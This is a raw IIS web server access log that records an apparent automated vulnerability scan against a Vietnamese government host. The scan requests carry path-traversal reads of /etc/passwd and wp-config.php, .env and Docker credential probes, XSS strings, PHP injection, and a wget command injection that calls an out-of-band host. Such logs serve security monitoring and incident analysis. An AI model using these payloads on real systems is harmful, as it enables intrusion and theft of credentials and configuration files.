2023-06-26 11:05:07 103.153.214.94 GET /config/getuser index=0 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 92
2023-06-26 11:08:13 103.153.214.94 POST / - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 25
2023-06-26 11:19:20 103.153.214.94 GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 30
2023-06-26 11:22:55 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/WebReferences 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 26
2023-06-26 11:22:55 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/Slots 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 23
2023-06-26 11:29:58 103.153.214.94 GET /.esmtprc - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 63
2023-06-26 11:36:40 103.153.214.94 GET /index.php folder=../../../../../../../../../../../../../../../tmp/&g=element&method=onAjax_files&option=com_fabrik&plugin=image&task=plugin.pluginAjax 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 28
2023-06-26 11:40:39 103.153.214.94 GET / action=command&command=set_city_timezone&value=$(wget%20http://cibehhqofm2ke57n2m2gincuzmta1zr31.oast.live)) 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 27
2023-06-26 11:45:20 103.153.214.94 GET /webmail/calendar/minimizer/index.php style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 37
2023-06-26 11:45:20 103.153.214.94 GET /webmail/calendar/minimizer/index.php style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 25
2023-06-26 11:52:46 103.153.214.94 POST /login/system - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 35
2023-06-26 11:54:22 103.153.214.94 POST /data/login - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login.html 404 7 0 36
2023-06-26 12:09:37 103.153.214.94 POST / - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 24
2023-06-26 12:13:43 103.153.214.94 GET /portal/attachment_downloadByUrlAtt.action filePath=file:///etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 33
2023-06-26 12:27:54 103.153.214.94 GET /.env - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 26
2023-06-26 12:27:55 103.153.214.94 GET /.env.bak - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 26
2023-06-26 12:27:55 103.153.214.94 GET /.env.dev - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 22
2023-06-26 12:27:55 103.153.214.94 GET /.env.dev.local - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 30
2023-06-26 12:27:55 103.153.214.94 GET /.env.development.local - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 22
2023-06-26 12:27:55 103.153.214.94 GET /.env.prod - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 24
2023-06-26 12:27:55 103.153.214.94 GET /.env.prod.local - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 26
2023-06-26 12:27:56 103.153.214.94 GET /.env.production - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 22
2023-06-26 12:27:56 103.153.214.94 GET /.env.production.local - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 23
2023-06-26 12:27:56 103.153.214.94 GET /.env.local - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 22
2023-06-26 12:27:56 103.153.214.94 GET /.env.example - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 30
2023-06-26 12:27:56 103.153.214.94 GET /.env.stage - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 24
2023-06-26 12:27:56 103.153.214.94 GET /.env.live - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 24
2023-06-26 12:27:56 103.153.214.94 GET /.env.backup - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 22
2023-06-26 12:27:57 103.153.214.94 GET /.env.save - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 22
2023-06-26 12:27:57 103.153.214.94 GET /.env.old - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 22
2023-06-26 12:27:57 103.153.214.94 GET /.env.www - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 23
2023-06-26 12:27:59 103.153.214.94 GET /.env_1 - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 21
2023-06-26 12:27:59 103.153.214.94 GET /.env_sample - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 22
2023-06-26 12:27:59 103.153.214.94 GET /.env.kontum - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 23
2023-06-26 12:27:59 103.153.214.94 GET /.env.bcvt - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 58
2023-06-26 12:28:00 103.153.214.94 GET /api/.env - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 33
2023-06-26 12:29:58 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_hsconfig 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 27
2023-06-26 12:38:59 103.153.214.94 GET /index.php fileid=../../../../../../../../../../etc/passwd%00&option=com_simpledownload&task=download 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 26
2023-06-26 12:42:07 103.153.214.94 GET /osclass/oc-admin/index.php action=render&file=../../../../../../../../../../etc/passwd&page=appearance 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 33
2023-06-26 12:44:03 103.153.214.94 GET /<script>alert(document.domain)</script> - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 400 0 0 30
2023-06-26 12:59:42 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_jvehicles 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 26
2023-06-26 13:02:07 103.153.214.94 GET /login.php/'><svg/onload=alert`2ReXbCqnEdUKzaNnrLuKXY5e0Sq`> - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 400 0 0 27
2023-06-26 13:10:15 103.153.214.94 GET /analytics/saw.dll bieehome&startPage=1 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 34
2023-06-26 13:10:16 103.153.214.94 GET /analytics/saw.dll getPreviewImage&previewFilePath=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 36
2023-06-26 13:16:52 103.153.214.94 GET /wp-content/plugins/candidate-application-form/downloadpdffile.php fileName=../../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 29
2023-06-26 13:18:04 103.153.214.94 GET /.dockercfg - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 27
2023-06-26 13:18:04 103.153.214.94 GET /.docker/config.json - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 23
2023-06-26 13:27:55 103.153.214.94 GET /Umbraco/feedproxy.aspx url=http://cibehhqofm2ke57n2m2g1d9ocbqu8cbfg.oast.live 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 29
2023-06-26 13:28:29 103.153.214.94 POST /api/v4/auth - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 29
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 13:49:39
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 13:49:39 103.153.214.94 GET /cs/idcplg FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&IdcService=GET_SEARCH_RESULTS&PageName=indext&PageTitle=OO&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&ResultCount=20&ResultTemplate=StandardResults&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&SortField=dInDate&SortOrder=Desc&dSecurityGroup 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 24
2023-06-26 13:49:39 103.153.214.94 GET /cs/idcplg FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&IdcService=GET_SEARCH_RESULTS&PageName=indext&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&ResultCount=20&ResultTemplate=StandardResults&ResultsTitle=AAA&SortField=dInDate&SortOrder=Desc&dSecurityGroup 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 24
2023-06-26 13:52:08 103.153.214.94 GET /downloader.php file=../../../../../../../../../../../../../etc/passwd%00.jpg 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 29
2023-06-26 14:07:53 103.153.214.94 GET /WebReport/ReportServer cmd=get_geo_json&op=chart&resourcepath=privilege.xml 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 27
2023-06-26 14:07:53 103.153.214.94 GET /report/ReportServer cmd=get_geo_json&op=chart&resourcepath=privilege.xml 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 22
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 14:23:05
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 14:23:05 103.153.214.94 GET /monitoring/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 400 0 0 43
2023-06-26 14:24:06 103.153.214.94 GET /wp-json/metform/v1/forms/templates/0 - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 29
2023-06-26 14:26:49 103.153.214.94 GET /lan.html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 26
2023-06-26 14:29:19 103.153.214.94 GET /img.php f=/./etc/./passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 25
2023-06-26 14:42:59 103.153.214.94 POST /login.html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 28
2023-06-26 14:44:59 103.153.214.94 GET /artifactory/ui/repodata deploy=true 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 28
2023-06-26 14:45:05 103.153.214.94 POST /druid/indexer/v1/sampler for=connect 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 23
2023-06-26 15:00:02 103.153.214.94 GET /service/0/test.oast.me - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 27
2023-06-26 15:11:40 103.153.214.94 GET /manage/wizard/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 30
2023-06-26 15:14:22 103.153.214.94 GET /topic/e'"><img+src=x+onerror=alert(2)> - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 400 0 0 31
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 15:45:54
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 15:45:54 103.153.214.94 GET /index.php option=com_sebercart&view=../../../../../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 28
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 16:02:39
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 16:02:38 103.153.214.94 GET /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php file=../../../wp-config.php 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 30
2023-06-26 16:17:19 103.153.214.94 GET /forums/search/z-->"></script><script>alert(document.domain)</script>/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 400 0 0 32
2023-06-26 16:26:20 103.153.214.94 GET / filename=/../../../../../../../../../../../../etc/passwd&option=com_helpdeskpro&original_filename=AnyFileName.exe&task=ticket.download_attachment 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 24
2023-06-26 16:33:25 103.153.214.94 GET /index.php a=index&content=<?php%20echo%20md5('ThinkCMF');&g=g&m=Door 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 27
2023-06-26 16:36:47 103.153.214.94 POST /admin/asign-single-student-subjects.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 31
2023-06-26 16:41:11 103.153.214.94 GET /api/downloads fileName=../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 28
2023-06-26 16:46:17 103.153.214.94 PUT /2ReXaoRpOKI94ldfD9qoj2CzfdJ.json - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 28
2023-06-26 16:46:17 103.153.214.94 GET /2ReXaoRpOKI94ldfD9qoj2CzfdJ.json - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 28
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 17:03:11
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 17:03:11 103.153.214.94 GET /comm.php id=../../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 27
2023-06-26 17:03:11 103.153.214.94 GET /viewrq.php format=ps&var_filename=../../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 23
2023-06-26 17:04:27 103.153.214.94 GET / - 8172 - 167.248.133.126 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 404 7 0 251
2023-06-26 17:08:23 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_joomlaflickr 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 29
2023-06-26 17:14:27 103.153.214.94 GET /OA_HTML/jtfwrepo.xml - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 27
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 17:32:40
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 17:32:39 103.153.214.94 GET /common/download/resource resource=/profile/../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 28
2023-06-26 17:32:39 103.153.214.94 GET /common/download/resource resource=/profile/../../../../Windows/win.ini 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 34
2023-06-26 17:37:41 103.153.214.94 GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php ajax_path=../../../../../../../wp-config.php 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 33
2023-06-26 17:37:41 103.153.214.94 GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php ajax_path=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 24
2023-06-26 17:43:31 103.153.214.94 GET /file valore=../../../../../windows/win.ini 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 24
2023-06-26 17:45:35 103.153.214.94 GET /wp-json/acf/v3/options/a field=plugins&id=active 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 37
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 18:01:44
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 18:01:43 103.153.214.94 GET /index.php option=com_loginbox&view=../../../../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 33
2023-06-26 18:05:45 103.153.214.94 POST /user/login/login - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 29
2023-06-26 18:05:46 103.153.214.94 GET /user/main - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/user/login/ 404 7 0 25
2023-06-26 18:08:51 103.153.214.94 POST / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 29
2023-06-26 18:08:52 103.153.214.94 GET /cgi-bin/execute_cmd.cgi cmd=cat%20/etc/passwd&timestamp=1589333279490 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 64
2023-06-26 18:14:42 103.153.214.94 GET /wp-content/plugins/wp-custom-pages/wp-download.php url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 35
2023-06-26 18:19:35 103.153.214.94 POST /login - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 29
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
